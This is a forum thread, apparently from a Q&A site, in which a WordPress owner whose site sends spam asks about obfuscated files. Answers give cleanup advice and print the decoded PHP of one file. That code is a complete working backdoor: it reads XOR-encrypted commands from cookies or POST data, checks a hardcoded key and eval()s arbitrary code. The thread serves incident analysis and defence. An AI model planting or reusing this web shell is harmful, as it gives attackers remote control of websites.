Maybe my WordPress site is hacked, because it's always sending spam (5000 per day). I found one file in plugins folder which contains this base64 code.
What should I do?
EDIT: Oh, I found another one.
EDIT 2: And another one.
Maybe my WordPress site is hacked, because it's always sending spam (5000 per day). I found one file in plugins folder which contains this base64 code.
What should I do?
EDIT: Oh, I found another one.
EDIT 2: And another one.
Actually you can deobfuscate the JS malware you received. You could do it yourself in few hours. You can see the attacker is substituting the alphabet and numbers from 0 to 9 and then encodes them.
The spams you receive could hence result from that malware. It will be good for you to study how it works exactly in order to take the appropriate actions.
Otherwise, if you do not have experience with such malware code analysis then do not panic. Try to find also where the code is generated from (which thing could be a harder task sometimes) by scanning fully your local environment and fulfill other steps mentioned here to get rid of it.
Of course, after getting rid of it, you will need to change your authentication credentials and check your logs and exploits and suspicious IP addresses using Fail2ban to update your firewall rules.
begueradj's answer is good, I only want to add that I went ahead and decoded the data. What executes doesn't look like anything related to spam email, rather it looks like logic related to cookies though I'm not sure exactly what it's doing (anyone more fluent with PHP willing to take a stab?). Code included below:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
$data = NULL;
$data_key = NULL;
$GLOBALS['auth'] = 'f3e90c82-5938-49aa-82db-d122a5b73318';
global $auth;
function sh_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function sh_decrypt($data, $key)
{
global $auth;
return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = @unserialize(sh_decrypt(@base64_decode($data), $data_key));
if (isset($data['ak']) && $auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => @phpversion(),
'sv' => '1.0-1',
);
echo @serialize($i);
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
}
EDIT: Looks like the last file you posted is the culprit for sending the spam emails. Here's the decoded version, I didn't analyze all 3000(!) lines but you've got a function in there named sendSmtpMail
which seems like a pretty good indicator of what the code is (at least partially) doing.
It's the same remote php shell I decoded here:
What is this? Virus or scanner?
There are only minor changes, and of course changed $GLOBALS["auth"] variable containing code encryption key, which means, that probably this code has been embedded by bot belonging to the different owner.